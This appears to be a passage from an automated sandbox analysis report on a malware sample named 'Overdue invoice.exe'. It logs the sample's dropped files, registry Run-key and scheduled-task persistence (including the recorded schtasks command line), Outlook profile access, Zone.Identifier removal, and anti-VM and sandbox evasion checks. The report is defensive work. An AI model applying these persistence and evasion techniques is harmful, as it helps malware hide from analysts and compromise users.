                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Overdue invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Overdue invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027366AD push FFFFFF8Bh; iretd
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07263D82 push esi; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D5170 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D5150 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE5D push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1E push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE16 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2E push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE26 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE22 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE3A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE36 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE32 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAC41 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EACBE push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAD56 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EBA60 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAA09 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E3139 push es; iretd
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C697CB push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C617E9 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69783 push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C61789 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6177F push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6977B push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69778 push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C63330 push es; iretd
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618CB push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618AF push es; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 4264Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276Thread sleep count: 4378 > 30
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276Thread sleep count: 4299 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7128Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020Thread sleep count: 3465 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020Thread sleep count: 5329 > 30
